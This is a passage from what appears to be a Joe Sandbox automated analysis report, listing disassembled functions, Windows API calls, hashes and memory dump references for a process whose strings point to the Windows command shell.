                                                                                                                    • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4291973834-0
                                                                                                                    • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction ID: fd36f15fa70688c71d3d237c448c6d7c2621358d1865a51b08f47448841d4206
                                                                                                                    • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction Fuzzy Hash: E641EA31A0864B82FB50BF14E848279BAB0FF84B87FA40435D90D47AA1EF7CE940C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1207 7ff789bd4a14-7ff789bd4a3e GetEnvironmentStringsW 1208 7ff789bd4a40-7ff789bd4a46 1207->1208 1209 7ff789bd4aae-7ff789bd4ac5 1207->1209 1210 7ff789bd4a48-7ff789bd4a52 1208->1210 1211 7ff789bd4a59-7ff789bd4a8f GetProcessHeap RtlAllocateHeap 1208->1211 1210->1210 1212 7ff789bd4a54-7ff789bd4a57 1210->1212 1213 7ff789bd4a9f-7ff789bd4aa9 FreeEnvironmentStringsW 1211->1213 1214 7ff789bd4a91-7ff789bd4a9a memmove 1211->1214 1212->1210 1212->1211 1213->1209 1214->1213
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                    • memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 647542462-0
                                                                                                                    • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction ID: 22b6ab8d10396b70089c8aa42b937a7d59a23d72c71fb2171ac516d91849c66a
                                                                                                                    • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction Fuzzy Hash: 42119122A1474A82EA50AF01A408039FFB1FB89FD1BA99038DE4E03784EE3DE441C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1826527819-0
                                                                                                                    • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction ID: 562cfe40114dfa559621950d2e94bbb69561535941de4195e46df5234c609949
                                                                                                                    • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction Fuzzy Hash: F5011E2190968ACAE7047F55A858179FE70FB8AF97FE45134E54F06396EF3C9044C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464828906-0
                                                                                                                    • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction ID: 27f947337f6c6770e3a38acb9bed05b055e5ccdb58b107c6198c233ad4e4fe5f
                                                                                                                    • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction Fuzzy Hash: EB31F521A0865A82E724BF15A44817EFA71FB45FDAFE48234DA4E433D1EE7DE885C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AD6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BD4AEF
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                      • Part of subcall function 00007FF789BD4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                      • Part of subcall function 00007FF789BD4A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                      • Part of subcall function 00007FF789BD4A14: memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                      • Part of subcall function 00007FF789BD4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE64
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF789BC8798), ref: 00007FF789BDEE78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3874763886-0
                                                                                                                    • Opcode ID: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                    • Instruction ID: 93bd9967961ae498392f02c231caa2ae154bb390240f73a08be53760b780a47c
                                                                                                                    • Opcode Fuzzy Hash: 573339bfc65e46a6dc0536e612d39ff43a234acebcc174d4b54bf8b687b66270
                                                                                                                    • Instruction Fuzzy Hash: D6F0FF61B15B4A87EF54AF659408178EDE1FF8EF92BA89434CD0E46390FE3CA444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                    • API String ID: 2221118986-3416068913
                                                                                                                    • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                    • Instruction ID: 56f4306ffe3eeef21e18e79876044f4c1efe6e873fa5226fe7c02e7276f555c6
                                                                                                                    • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                    • Instruction Fuzzy Hash: 61110A21A0874E80EB50EF11A558279AA70BF84FF5FB44631ED6D473D9DE2CD440C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcschr
                                                                                                                    • String ID: 2$COMSPEC
                                                                                                                    • API String ID: 1764819092-1738800741
                                                                                                                    • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                    • Instruction ID: dad3247484231f4620d27b32b7f05e5ad35f3121378a2ce9d7bcf6fd313c953c
                                                                                                                    • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                    • Instruction Fuzzy Hash: 52519321E0865B85FFA07F21945037DABB1BF84FAAFA44431DA0D867D5DE2CE940C761
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4254246844-0
                                                                                                                    • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                    • Instruction ID: a74fc31d91888e8cbadc97295c7ad9770a56e1494522a9be2ba47df0147e3548
                                                                                                                    • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                    • Instruction Fuzzy Hash: BE419021A0878A86FA20AF11E458379EFB0FF85F86FA44534DA4D477C5EE3CE441C660
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_osfhandle$ConsoleMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1591002910-0
                                                                                                                    • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                    • Instruction ID: 78907c7d7005bb37b19433dba7b26aabe8547539148495c338719ea27d304044
                                                                                                                    • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                    • Instruction Fuzzy Hash: 19F06734A09706CBE644AF21E845578FEB0FB89B52FA54138CA0A43350DF3EA405CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DriveType
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 338552980-336475711
                                                                                                                    • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                    • Instruction ID: 1384a2430a5d5666cb4e0709944789bbe6f1b12358afe202fbef5f12508874a6
                                                                                                                    • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                    • Instruction Fuzzy Hash: F9E06D6761864486E720AF60E46106AFBB0FB8DB49FD41525EA8D83724EB3CD249CB18
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
                                                                                                                      • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    • GetConsoleTitleW.KERNELBASE ref: 00007FF789BD5B52
                                                                                                                      • Part of subcall function 00007FF789BD4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4297
                                                                                                                      • Part of subcall function 00007FF789BD4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD42D7
                                                                                                                      • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD42FD
                                                                                                                      • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD4368
                                                                                                                      • Part of subcall function 00007FF789BD4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4380
                                                                                                                      • Part of subcall function 00007FF789BD4224: wcsrchr.MSVCRT ref: 00007FF789BD43E6
                                                                                                                      • Part of subcall function 00007FF789BD4224: lstrcmpW.KERNELBASE ref: 00007FF789BD4401
                                                                                                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF789BD5BC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 346765439-0
                                                                                                                    • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                    • Instruction ID: 88530a8203dc92bb8fa77ee8670fb8708c2c0320cd1dc7d72425bbee2d386035
                                                                                                                    • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                    • Instruction Fuzzy Hash: 9531C720A1D64A46FA24FF11A4585BDEAB1FF89F81FE45431E94E47B85DE3CE402C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1412018758-0
                                                                                                                    • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                    • Instruction ID: abb47e74f2deeaff718d3b7b7f253e0e815d4a66539a82631076387f0f22c46c
                                                                                                                    • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                    • Instruction Fuzzy Hash: 0FE0ED45F5A60F95FE183F6268491749A647F59F52FE81430DD1D46382EF2CA191C330
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCD90 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357844191-0
                                                                                                                    • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                    • Instruction ID: cfd8712d1361f5e66fae49d95ca13ded6b832166a271b548b27737b374a85609
                                                                                                                    • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                    • Instruction Fuzzy Hash: 23F01D31A1874686EA44AF15F844478FBB5FB89F42BA89434D90E03394DF3DE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
